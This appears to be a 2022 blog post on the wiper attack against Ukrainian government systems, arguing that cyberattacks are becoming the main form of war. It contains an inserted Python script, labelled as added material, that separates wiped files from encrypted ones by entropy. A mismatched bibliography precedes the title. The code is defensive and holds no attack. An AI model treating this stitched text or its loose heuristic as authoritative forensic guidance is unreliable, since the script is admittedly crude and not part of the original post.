Brennan, Margaret, et al. “Ukraine Hit with Cyberattack, a Tactic It ‘Expected’ to Precede a ‘Full Invasion’ by Russia.” CBS News, CBS Interactive, 14 Jan. 2022, https://www.cbsnews.com/news/ukraine-cyber-attack-russia-us-nato-donbas-war-amabssador-markarova/.

Cadell, Cate. “China Harvests Masses of Data on Western Targets, Documents Show.” The Washington Post, WP Company, 1 Jan. 2022, https://www.washingtonpost.com/national-security/china-harvests-masses-of-data-on-western-targets-documents-show/2021/12/31/3981ce9c-538e-11ec-8927-c396fa861a71_story.html. 

Carmichael, Flora. “How a Fake Network Pushes pro-China Propaganda.” BBC News, BBC, 5 Aug. 2021, https://www.bbc.com/news/world-asia-china-58062630. 

Fife, Robert, and Steven Chase. “Canada’s Spy Agency Warns MPs to Beware of Influence Operations from China.” The Globe and Mail, 11 Jan. 2022, https://www.theglobeandmail.com/politics/article-spy-agency-briefing-mps-to-beware-of-influence-operations-from-china/.

Sood, Aditya, and Rohit Chaturvedi. “Collector-Stealer: A Russian Origin Credential and Information Extractor.” Virus Bulletin, 8 Dec. 2021, https://www.virusbulletin.com/uploads/pdf/magazine/2021/202112-collector-stealer.pdf.

Cyberattacks: Accepting a New Normal for War in the 21st Century

January 19th, 2022 

Technology is dramatically changing the future of conflict. A computer is proving to be as destructive and lethal as the weapons of the past, if not more so.

What Happened This Weekend? 

The year has only just begun, and of course, a pandemic wasn't enough. On Saturday, January 15th, 2022, a destructive cyberattack in Ukraine began to rapidly garner international attention (1). The Microsoft Threat Intelligence Center (MSTIC) warned that it had identified destructive malware on computer systems at several Ukrainian government agencies, non-profit organizations, and technology organizations, according to a statement issued by the company (2). Many of the victim systems belong to agencies and organizations that work closely with the Ukrainian government to provide critical executive-branch and emergency-response functions (1, 3). Although the Microsoft warning was only issued on Saturday evening, the destructive malware, which is capable of wiping data, first appeared on victim systems in Ukraine on Thursday, January 13th, 2022 (3, 4). Further details about the malware were made public in a blog post by the company. According to Microsoft's security specialists, the malware's appearance on Thursday, January 13th, coincided with the defacement of Ukrainian government websites on the nights of January 13th and 14th, 2022 (2).

These defacements targeted Ukrainian government websites, including those of the Ministry of Foreign Affairs and the Ministry of Education (1, 3). Microsoft also reported that the malware was designed to resemble ransomware but lacked any mechanism for recovering the data after payment (2). Microsoft emphasized its belief that the malware's intent was to render targeted devices inoperable and to destroy data at the attackers' command (2). In addition to Microsoft's comments, the Ukrainian government has announced that it has gathered evidence suggesting Russian involvement in the cyberattack (3). Ukraine's Ministry of Digital Development went as far as to say that all evidence indicates Russian involvement (3).
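To make the “ransomware without a recovery mechanism” point concrete: when triaging files that a suspected ransomware sample has touched, a responder can check whether the files contain anything that could ever be decrypted. The Python script below is an added example, not Microsoft's analysis and not code from the original post. It assumes, as a triage heuristic rather than a fact the post states, that a wiper merely posing as ransomware overwrites files with a constant fill byte or zeros, whereas genuine encryption leaves high-entropy ciphertext; the sample file contents are constructed inline, and the toy keystream exists only to fabricate a high-entropy sample offline.

```python
import hashlib
import math
from collections import Counter

# --- Constructed sample files (not artefacts from the Ukrainian incident) ---
PLAINTEXT = b"Quarterly budget report, revision 3\n" * 150


def _toy_keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode, used only to fabricate a high-entropy sample.
    Not a recommended cipher; it exists so the example runs with no key material."""
    out = bytearray()
    block = 0
    while len(out) < length:
        out += hashlib.sha256(key + block.to_bytes(8, "big")).digest()
        block += 1
    return bytes(out[:length])


ENCRYPTED = bytes(p ^ k for p, k in zip(PLAINTEXT, _toy_keystream(b"constructed-key", len(PLAINTEXT))))
WIPED_FILL = b"\xcc" * len(PLAINTEXT)   # constant-byte overwrite: nothing left to decrypt
WIPED_ZERO = b"\x00" * len(PLAINTEXT)   # zero-fill overwrite: same outcome

SAMPLE_FILES = {
    "report.docx": ENCRYPTED,
    "ledger.xlsx": WIPED_FILL,
    "notes.txt": WIPED_ZERO,
    "readme.txt": PLAINTEXT,
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant fill, close to 8.0 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_file(data: bytes) -> str:
    """Triage verdict for one file the sample touched."""
    if not data:
        return "empty"
    if len(set(data)) == 1:
        return "wiped_fixed_fill"        # one repeated byte: no key will recover this
    if shannon_entropy(data) > 7.5:
        return "high_entropy"            # consistent with real encryption (or compression)
    return "plaintext_or_intact"


def triage(files: dict) -> dict:
    """Map each filename to its verdict."""
    return {name: classify_file(data) for name, data in files.items()}


def overall_verdict(files: dict) -> str:
    """If more touched files were overwritten with a fixed pattern than show ciphertext,
    the ransom note is a ruse: this is destruction, not extortion."""
    verdicts = triage(files)
    wiped = sum(v == "wiped_fixed_fill" for v in verdicts.values())
    encrypted = sum(v == "high_entropy" for v in verdicts.values())
    if wiped > encrypted:
        return "wiper_masquerading_as_ransomware"
    if encrypted:
        return "encryption_observed"
    return "no_damage_detected"


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_FILES).items():
        print(f"{name:12s} {verdict:22s} entropy={shannon_entropy(SAMPLE_FILES[name]):.2f}")
    print("overall:", overall_verdict(SAMPLE_FILES))
```

The entropy threshold is deliberately loose: compressed formats such as .docx or .zip are also high-entropy, so a "high_entropy" verdict only means the file might be ciphertext, while a constant fill is conclusive. In a real case the check would be run against files from an affected host, and the result weighed alongside the ransom note itself (whether it carries a per-victim identifier and a working contact channel).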

Despite the lengthy statements made by both Microsoft and the Ukrainian government, one question still evades us: who is really behind the attack? Microsoft has so far been unable to provide a definitive answer, aside from informing the international community that it has begun investigating the origin of the attacks. By contrast, Ukrainian officials have not wasted any time in making their suspicions evident (3). According to Reuters, Ukraine initially suggested that a hacking group associated with Belarus was responsible, based on similarities between the malware used in this attack and that of previous attacks (4). At the same time, however, Ukraine suggested that Russian involvement is undeniable, and that “all evidence indicates that Russia is behind the cyberattack” (1). Where's the evidence, you ask? To that, Ukraine has no response.

Digging Deeper

This past weekend's cyberattacks are not a new phenomenon. Cyberattacks have been a defining characteristic of the tension between the two countries since the collapse of the Soviet Union (3). Shortly after the Soviet Union dissolved, both countries began using cyberattacks as weapons to further their confrontation (3). Experts now use the term “cyber war” to describe similar computer-driven conflicts across the globe (5). In response to the events that transpired on Saturday, Bart Groothuis, a member of the European Parliament, said, “Cyber warfare doesn't exist, it's nonsense” (5). Is he right, or is he simply refusing to accept that war as we understand it is changing?

Let’s explore some more and then revisit his statement…

The Emergence of a New Weapon 

The sophistication of cyberattacks has evolved steadily over the last three decades, and more recently they have become a staple of all things criminal. They are increasingly used as a means of perpetrating violence, aggression, and even death. As political tensions have heightened across the globe since the early 2000s, cyberattacks have become a preferred means for extremist groups, terror organizations, and other malevolent actors to wage war and incite violence. The cyberattack in Ukraine is just one of many similar attacks, and it is far from the biggest to have occurred recently. Remember when we naively believed that the pandemic would be our biggest obstacle in 2021? Well, 2021 also witnessed some of the biggest cyberattacks in recent years, with millions of people impacted (6). There was the Colonial Pipeline attack, the Twitch data dump, the JBS Foods hack, and the infamous CNA Financial hack, in which the data-captors were paid an astounding $40 million (6). These attacks all transpired in 2021, but lest we forget, there was also the Stuxnet worm, discovered in 2010, which remains one of the most sophisticated pieces of malware in history (6); it was not ransomware at all, but a sabotage tool that physically damaged industrial control equipment. If you remember 2010, then you must recall 2015, when hackers supported by the Chinese government breached the computer systems of the Office of Personnel Management and stole the personal information of roughly 22 million federal employees and applicants (6).

The lesson here? 

Cyberattacks will only become more destructive and nefarious with time. Things are only just beginning…

The Modern Battlefield 

Going forward, we must be vigilant and, above all, remember not to underestimate these attacks simply because they are not physical. We are no longer living in an era in which war requires bloody battlefields, rifles, aircraft, submarines, and other physical weapons. Instead, we are living in a world driven by technology, which can be used for as much violence as it is used for driving positive change and progress. Although the incident in Ukraine over the weekend was severe and must not be overlooked, we can anticipate many more attacks of similar or greater severity in the near future. The world is currently working towards refining and fully exploiting the power of quantum computing, autonomous machines, artificial intelligence, and cloud computing, all of which will no doubt play a significant role in cyber conflict (7, 8). As our understanding of these technologies increases, it is inevitable that some will use them for evil. Either way, we all need to understand and accept that cyberattacks are the future of war. Suit up, because we have never seen anything like this before.

References

1. https://www.nytimes.com/2022/01/16/us/politics/microsoft-ukraine-cyberattack.html

2. https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

3. https://www.cnn.com/2022/01/16/europe/ukraine-malware-microsoft-warning-intl/index.html

4. https://www.reuters.com/world/europe/microsoft-says-it-observed-destructive-malware-systems-belonging-several-ukraine-2022-01-16/

5. https://www.politico.eu/article/cyber-security-russia-ukraine-nato-europe/

6. https://ca.finance.yahoo.com/news/biggest-cyber-hacks-2021-105645115.html#:~:text=1.,largest%20oil%20and%20gas%20companies.

7. https://cove.army.gov.au/article/the-future-cyber-conflict

8. https://www.honeywell.com/us/en/news/2020/10/the-future-of-cybersecurity

9. https://www.kcl.ac.uk/news/will-the-next-war-be-a-cyberwar

Hope you enjoyed this post! Feel free to comment below!